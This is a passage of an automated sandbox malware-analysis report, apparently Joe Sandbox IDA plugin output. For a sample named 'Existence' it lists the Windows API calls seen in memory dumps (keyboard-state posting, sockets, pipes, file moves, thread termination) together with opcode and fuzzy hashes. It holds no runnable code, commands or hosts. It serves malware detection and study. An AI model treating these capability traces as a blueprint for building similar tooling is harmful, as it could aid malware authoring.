• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 0699dee601591ce24da9213d3888c4020d87b0184628c92dec4483691f2c2c38
• Instruction ID: d9c240f891830ba4f2d61df5e5a862b89cab7471561a79098947ef736f051c77
• Opcode Fuzzy Hash: 0699dee601591ce24da9213d3888c4020d87b0184628c92dec4483691f2c2c38
• Instruction Fuzzy Hash: 7D51EFA06187D57EFF364234BD49BBABEA99B06314F088489E1D9458D2C3ECACC4D790
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetParent.USER32(00000000), ref: 0079B6E0
• GetKeyboardState.USER32(?), ref: 0079B6F5
• SetKeyboardState.USER32(?), ref: 0079B756
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0079B782
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0079B79F
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0079B7DE
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0079B7FF
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: fb5ae9e7c0d8b9497725b496c87f3e021e9d7153e0b9ef1140edbdaef5524492
• Instruction ID: 29a39c358811bc528535ee69b4c5df9b6438e9d416777e1411c793166423bb76
• Opcode Fuzzy Hash: fb5ae9e7c0d8b9497725b496c87f3e021e9d7153e0b9ef1140edbdaef5524492
• Instruction Fuzzy Hash: 305103A09087D53DFF3283A4BD55B76BEA95B46304F08858EE0D44A8D2D39CEC94D790
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00765F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007657E3
• __fassign.LIBCMT ref: 0076585E
• __fassign.LIBCMT ref: 00765879
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0076589F
• WriteFile.KERNEL32(?,FF8BC35D,00000000,00765F16,00000000,?,?,?,?,?,?,?,?,?,00765F16,?), ref: 007658BE
• WriteFile.KERNEL32(?,?,00000001,00765F16,00000000,?,?,?,?,?,?,?,?,?,00765F16,?), ref: 007658F7
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 45cdb844a890c8ab5ad055e3ff4592a7cda7618f06b399d53c0fe1834b67804e
• Instruction ID: 99c004026c57e9b35d81ac096c615d5ef08871144a87b75e232dc8db1122ee7d
• Opcode Fuzzy Hash: 45cdb844a890c8ab5ad055e3ff4592a7cda7618f06b399d53c0fe1834b67804e
• Instruction Fuzzy Hash: 6751B271A00649DFDB10CFA8D885AEEBBF8FF09320F14411AE956E7291E734AD51DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 007530BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 007530C3
• _ValidateLocalCookies.LIBCMT ref: 00753151
• __IsNonwritableInCurrentImage.LIBCMT ref: 0075317C
• _ValidateLocalCookies.LIBCMT ref: 007531D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 14195ed5a320403b76e0be325b83bd3f8bd3fddf93660f6d2f5419943bd9ea95
• Instruction ID: 5613df17fac3e0f6c88b73007b82afe90e35ce2356d9e04941f5cec9c9c3fd09
• Opcode Fuzzy Hash: 14195ed5a320403b76e0be325b83bd3f8bd3fddf93660f6d2f5419943bd9ea95
• Instruction Fuzzy Hash: F0418634A0060CDBCF10DF68C885ADE7BB5AF443A5F148155EC196B3B2D7B99B09CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
  • Part of subcall function 007B3AAB: _wcslen.LIBCMT ref: 007B3AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007B1B6F
• WSAGetLastError.WSOCK32 ref: 007B1B7E
• WSAGetLastError.WSOCK32 ref: 007B1C26
• closesocket.WSOCK32(00000000), ref: 007B1C56
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: 89f0e0ad0ab8d57b6eb39b50ed54350614e0e13e5364a59a5d72d72fee452054
• Instruction ID: e1e6a5a368afa852ed547a44834e135f730b13f9dc5e6017cac1782c22a05c00
• Opcode Fuzzy Hash: 89f0e0ad0ab8d57b6eb39b50ed54350614e0e13e5364a59a5d72d72fee452054
• Instruction Fuzzy Hash: BE41D671600504EFDB109F24C845FEABBE9EF45324F948069F8159B292D778ED41CBE1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0079D7CD,?), ref: 0079E714
  • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0079D7CD,?), ref: 0079E72D
• lstrcmpiW.KERNEL32(?,?), ref: 0079D7F0
• MoveFileW.KERNEL32(?,?), ref: 0079D82A
• _wcslen.LIBCMT ref: 0079D8B0
• _wcslen.LIBCMT ref: 0079D8C6
• SHFileOperationW.SHELL32(?), ref: 0079D90C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
• Opcode ID: b95e298368022284284c72909c52fe65c1e8d9ad5fdb2d5eb9cd9200fb9c2457
• Instruction ID: f5ba34f3d2b5151bf8466b0e48dbd57155179a6676168cda4b58e1e29d08b5fa
• Opcode Fuzzy Hash: b95e298368022284284c72909c52fe65c1e8d9ad5fdb2d5eb9cd9200fb9c2457
• Instruction Fuzzy Hash: EE416771905218DEDF22EFA4D985EDD77B8AF08340F1004EAA545EB142EB7CAB88CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007C38B8
• GetWindowLongW.USER32(?,000000F0), ref: 007C38EB
• GetWindowLongW.USER32(?,000000F0), ref: 007C3920
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007C3952
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007C397C
• GetWindowLongW.USER32(?,000000F0), ref: 007C398D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C39A7
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 79c5dd02180a45a4b6d30883f34e852d712a4981f0866a646715088d5434eabb
• Instruction ID: b948abd06f9135b865c66c5ea3a8bb672e909e163b205cba3e52c1793c0eef74
• Opcode Fuzzy Hash: 79c5dd02180a45a4b6d30883f34e852d712a4981f0866a646715088d5434eabb
• Instruction Fuzzy Hash: 1C311F30604255AFDB618F48DC89F643BE1FB8A724F1581ACF5508B2B2CBB9AD84DB11
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007980D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007980F6
• SysAllocString.OLEAUT32(00000000), ref: 007980F9
• SysAllocString.OLEAUT32(?), ref: 00798117
• SysFreeString.OLEAUT32(?), ref: 00798120
• StringFromGUID2.OLE32(?,?,00000028), ref: 00798145
• SysAllocString.OLEAUT32(?), ref: 00798153
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 1743a9f92de0e5c75e7db91074a989f9f4123ae7934c103fb4484eae9c0301ba
• Instruction ID: 1f3e7b7ffc2c81a227c918dcc5048a79f3dfa351d3abd08542c33d4f9f4dcdb9
• Opcode Fuzzy Hash: 1743a9f92de0e5c75e7db91074a989f9f4123ae7934c103fb4484eae9c0301ba
• Instruction Fuzzy Hash: DA21A77260021DAFDF50DFA8DC88CBB77ACEB093607048529FE15DB290DA78DD468765
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007981A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007981CF
• SysAllocString.OLEAUT32(00000000), ref: 007981D2
• SysAllocString.OLEAUT32 ref: 007981F3
• SysFreeString.OLEAUT32 ref: 007981FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 00798216
• SysAllocString.OLEAUT32(?), ref: 00798224
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 7283b5c5d28ee190a6e2a36c372acf2318b5c03ff4eebbcfc45696aa9243fc5a
• Instruction ID: 01edc8986da738985dd0cae6a6a8038dc65636c3eaef1b69e2113c6623224e61
• Opcode Fuzzy Hash: 7283b5c5d28ee190a6e2a36c372acf2318b5c03ff4eebbcfc45696aa9243fc5a
• Instruction Fuzzy Hash: 97218671600508BF9F54DFA8EC89DAA77ECFB0A3607048129F905CB1A1DA78ED42C765
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(0000000C), ref: 007A0E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A0ED5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: cc7925ff703bb6218e12f14d039ae7c274a740ab62174e3c33dc11f914da7c8f
• Instruction ID: ad7c8af71722c8a2b8a8ce0c4af3989d49d818a8e7a1f2a499b88699ddc0ce96
• Opcode Fuzzy Hash: cc7925ff703bb6218e12f14d039ae7c274a740ab62174e3c33dc11f914da7c8f
• Instruction Fuzzy Hash: 8621597150430AAFDB309F68D804E9AB7A8BF96320F204E29FCA5A72D0D7759841DB90
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 007A0F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A0FA8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 8333a0a4283f371ce4aeebdddc78b117b2e03ca518e66fab9b443d3a1eb00a33
• Instruction ID: 0d9647d0d7b29c4f460a3ec1162c548cb057347cfc370884c1ab8e0bacb5cb57
• Opcode Fuzzy Hash: 8333a0a4283f371ce4aeebdddc78b117b2e03ca518e66fab9b443d3a1eb00a33
• Instruction Fuzzy Hash: 0B217771500345DFEB309F688C04A9AB7E8BF96724F204B1DF9A1E72D0E7789981DB50
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00737873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
  • Part of subcall function 00737873: GetStockObject.GDI32(00000011), ref: 007378C5
  • Part of subcall function 00737873: SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007C4BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007C4BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007C4BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007C4BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007C4BE3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 58183069cb292f31e235b4d4daae29363f173725b9b2741a3e9835d48a229294
• Instruction ID: a4a4fb6548763382a5e3a2ff3dbd5593f607f77b82f6f612d81211dfeb16814f
• Opcode Fuzzy Hash: 58183069cb292f31e235b4d4daae29363f173725b9b2741a3e9835d48a229294
• Instruction Fuzzy Hash: 9411B6B114021DBEEF118F64CC85FE77FADEF08758F014114B608A6050CA75DC21DBA4
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0076DB23: _free.LIBCMT ref: 0076DB4C
• _free.LIBCMT ref: 0076DBAD
  • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
  • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
• _free.LIBCMT ref: 0076DBB8
• _free.LIBCMT ref: 0076DBC3
• _free.LIBCMT ref: 0076DC17
• _free.LIBCMT ref: 0076DC22
• _free.LIBCMT ref: 0076DC2D
• _free.LIBCMT ref: 0076DC38
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction ID: 22f8d558de9ac32b6157081deb8593f44298909d6c7bde3dec3bbe3434fda455
• Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction Fuzzy Hash: 0D113DB2A51B44EAD530BBB0CC0BFDB77DC9F15700F410C19BA9FEA152EB69B9058650
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _memcmp
• String ID: j`y
• API String ID: 2931989736-4129633755
• Opcode ID: b13d2c033e35a378b1647b869ee5119291a67720934bda8b28af53fef37184c7
• Instruction ID: cad9937c1cb29745cb07f8fbc70a86aa094fe1dda97e0affc529c1bd5708c24f
• Opcode Fuzzy Hash: b13d2c033e35a378b1647b869ee5119291a67720934bda8b28af53fef37184c7
• Instruction Fuzzy Hash: 9701B5E1604309BB9A1056286CC2FEB736D9F5439AF004522FD099A341F76DED14C6F1
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0079E328
• LoadStringW.USER32(00000000), ref: 0079E32F
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0079E345
• LoadStringW.USER32(00000000), ref: 0079E34C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079E390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0079E36D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: 4abb7d0c7c761c255029fdee0467dfd689a250843519f059aee680d1ebac339f
• Instruction ID: 11abaad433febe5a56b2c695281db3901258ddf027ebf2d9e9b616e64f5f403a
• Opcode Fuzzy Hash: 4abb7d0c7c761c255029fdee0467dfd689a250843519f059aee680d1ebac339f
• Instruction Fuzzy Hash: 500186F290020CBFE72197A4DD89EF7776CD708344F0185B5B705E6041E6789E848B79
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,?), ref: 007A1322
• EnterCriticalSection.KERNEL32(00000000,?), ref: 007A1334
• TerminateThread.KERNEL32(00000000,000001F6), ref: 007A1342
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007A1350
• CloseHandle.KERNEL32(00000000), ref: 007A135F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 007A136F
• LeaveCriticalSection.KERNEL32(00000000), ref: 007A1376
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 603f890deea22856a45b0486a3f83c2957f2265bcc610553cf8357ae3120ca76
• Instruction ID: d956dc3c8a4e3339128f48b98058fa3565e263add5e8c3a559b3d9b95b114dce
• Opcode Fuzzy Hash: 603f890deea22856a45b0486a3f83c2957f2265bcc610553cf8357ae3120ca76
• Instruction Fuzzy Hash: 39F0EC32042A12FBD7615F94EE49FD6BB39FF45302F805135F102918A087789872CF94
Uniqueness
Uniqueness Score: -1.00%

APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007B281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007B283E
• WSAGetLastError.WSOCK32 ref: 007B284F
• htons.WSOCK32(?,?,?,?,?), ref: 007B2938
• inet_ntoa.WSOCK32(?), ref: 007B28E9
  • Part of subcall function 0079433E: _strlen.LIBCMT ref: 00794348
  • Part of subcall function 007B3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,007AF669), ref: 007B3C9D
• _strlen.LIBCMT ref: 007B2992
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: 97be81d3d17c1cfa1c69c09d69338cf249d6e730d921eff3f91f3c7af5b7e557
• Instruction ID: e1598cb8b903165b84011f41754802fd8466b5fc4a5320851c3b22f41a8e2526
• Opcode Fuzzy Hash: 97be81d3d17c1cfa1c69c09d69338cf249d6e730d921eff3f91f3c7af5b7e557
• Instruction Fuzzy Hash: 4FB1DF71604300EFD324DF24C889F6ABBA5AF84318F54894CF55A5B2A3DB39ED46CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 0076042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00760446
• __allrem.LIBCMT ref: 0076045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0076047B
• __allrem.LIBCMT ref: 00760492
